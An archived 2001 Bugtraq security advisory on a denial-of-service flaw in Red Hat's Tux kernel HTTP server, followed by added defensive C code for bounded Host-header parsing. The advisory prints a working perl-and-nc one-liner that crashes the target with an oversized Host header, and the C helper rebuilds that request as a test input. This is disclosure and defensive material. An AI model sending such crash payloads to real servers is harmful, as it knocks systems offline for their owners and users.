7435103 2001-11-05 12:57 +0000  /79 lines/ Aiden ORawe <a.orawe@ntlworld.com>
Sent by: joel@lysator.liu.se
Imported: 2001-11-05  18:34  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <19675>
Subject: RH Linux Tux HTTPD DoS
------------------------------------------------------------
From: "Aiden ORawe" <a.orawe@ntlworld.com>
To: <bugtraq@securityfocus.com>
Message-ID: <001201c165f9$64c2e1c0$6e00a8c0@win2ksa00>


TUX HTTPD Denial of Service Condition
=====================================


Background:
-------------

Tux is a kernel-space HTTP server coded for optimal performance (IRQ
affinity, HTTP compression, direct scatter-gather DMA etc.).  It is
meant to be used as the main HTTP server for static objects, with
requests for dynamic content being passed to a user-space HTTPD
server such as Apache on the same box when necessary. Tux is disabled
by default.


Vulnerability:
--------------

It is possible to cause a denial of service condition by submitting
an oversized "Host:" header request to the Tux daemon causing an
assertion failure and eventual Kernel Panic.  A total system reboot
is required to return full functionality. For example the following
script will cause the target box to crash:


perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" | nc <ip address> <dest_port>


The following output will then be generated (edited for brevity):


Code: Bad EIP Value.
 (0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!


To the best of my knowledge this is *not* a buffer overflow (despite
apparently being able to overwrite the contents of the EIP register)
and as such cannot be utilised to run arbitrary code.  FYI, the Tux
source code contains numerous assertions that are used to safeguard
data integrity, and if any of these assertions fail (as it does in
this case) code execution is halted by making a call to the BUG()
function.


System(s) tested:
-----------------

RedHat Linux 7.2, Kernel 2.4.7-10 and 2.4.9-7 running TUX-2.1.0-2.


Additional Notes:
-----------------

security@redhat.com were advised of this issue on 25 October 2001.


Solution:
---------

See Security Advisory - RHSA-2001:142-15

http://www.redhat.com/support/errata/RHSA-2001-142.html


Thanks:
-------

Michael K. Johnston


============================================================================
(7435103) /Aiden ORawe <a.orawe@ntlworld.com>/(Reflowed)
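The failure mode in the post is a length assertion in kernel-space header parsing that escalates to BUG() and a panic. The following is an added example, written for this page and not taken from the original post or from the Tux source, showing the alternative a practitioner would want: a bounded "Host:" parser that rejects an oversized value with an error return, so the request is dropped and the machine stays up. The MAX_HOST_LEN limit, the return codes, and the build_request() helper (which constructs the same request the perl one-liner above sends, with a configurable number of 'A's) are all assumptions of the example.

```c
/* Added example: bounded parsing of the HTTP "Host:" header.
 * Not part of the original Bugtraq post and not Tux code.
 * An oversized value is rejected with an error code instead of an
 * assertion (BUG()) that would take the whole system down.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_HOST_LEN 255   /* assumed limit; DNS names are at most 255 octets */

/* Return codes (assumed for this example) */
enum { HOST_OK = 0, HOST_MISSING = -1, HOST_TOO_LONG = -2, HOST_BAD_CHAR = -3 };

/* Case-insensitive prefix match, so "host:" and "HOST:" are both found. */
static int starts_with_ci(const char *s, size_t len, const char *prefix)
{
    size_t plen = strlen(prefix);
    if (len < plen)
        return 0;
    for (size_t i = 0; i < plen; i++)
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)prefix[i]))
            return 0;
    return 1;
}

/* Scan a raw request (not necessarily NUL terminated) for a "Host:" line.
 * Lines end in "\n" or "\r\n"; a blank line ends the header block.
 * The value is copied to out (NUL terminated) only when it fits both
 * MAX_HOST_LEN and out_sz; otherwise an error code is returned and out is
 * left untouched.  No assertion is ever raised on attacker-controlled data.
 */
int parse_host_header(const char *req, size_t req_len, char *out, size_t out_sz)
{
    const char *p = req, *end = req + req_len;

    while (p < end) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        size_t line_len = eol ? (size_t)(eol - p) : (size_t)(end - p);

        if (line_len && p[line_len - 1] == '\r')   /* strip CR of CRLF */
            line_len--;
        if (line_len == 0)                          /* end of headers */
            return HOST_MISSING;

        if (starts_with_ci(p, line_len, "Host:")) {
            const char *v = p + 5;
            size_t vlen = line_len - 5;

            while (vlen && (*v == ' ' || *v == '\t')) { v++; vlen--; }
            while (vlen && (v[vlen - 1] == ' ' || v[vlen - 1] == '\t')) vlen--;

            if (vlen > MAX_HOST_LEN || vlen + 1 > out_sz)
                return HOST_TOO_LONG;               /* reject, do not assert */

            /* hostname, IPv4/IPv6 literal, optional :port */
            for (size_t i = 0; i < vlen; i++) {
                unsigned char c = (unsigned char)v[i];
                if (!(isalnum(c) || c == '.' || c == '-' || c == ':' ||
                      c == '[' || c == ']'))
                    return HOST_BAD_CHAR;
            }
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return HOST_OK;
        }
        if (!eol)
            break;
        p = eol + 1;
    }
    return HOST_MISSING;
}

/* Build the request the perl one-liner in the post sends, with host_len
 * 'A' bytes as the Host value.  Caller frees the result.  (Constructed
 * input for the example; 6000 reproduces the post.)
 */
char *build_request(size_t host_len)
{
    const char *head = "GET / HTTP/1.0\nAccept: */*\nHost: ";
    size_t hl = strlen(head);
    char *buf = malloc(hl + host_len + 2);
    if (!buf)
        return NULL;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', host_len);
    buf[hl + host_len] = '\n';
    buf[hl + host_len + 1] = '\0';
    return buf;
}

int main(void)
{
    char host[MAX_HOST_LEN + 1];
    char *req = build_request(6000);
    int rc = parse_host_header(req, strlen(req), host, sizeof host);
    printf("6000-byte Host: rc=%d (HOST_TOO_LONG=%d)\n", rc, HOST_TOO_LONG);
    free(req);

    const char *good = "GET / HTTP/1.0\r\nHost: example.com\r\n\r\n";
    rc = parse_host_header(good, strlen(good), host, sizeof host);
    printf("normal request: rc=%d host=%s\n", rc, rc == HOST_OK ? host : "-");
    return 0;
}
```

The design point is that the check runs before any copy and returns a value the caller can turn into a 400 response; an assertion belongs only on invariants the code itself guarantees, never on lengths that arrive from the network.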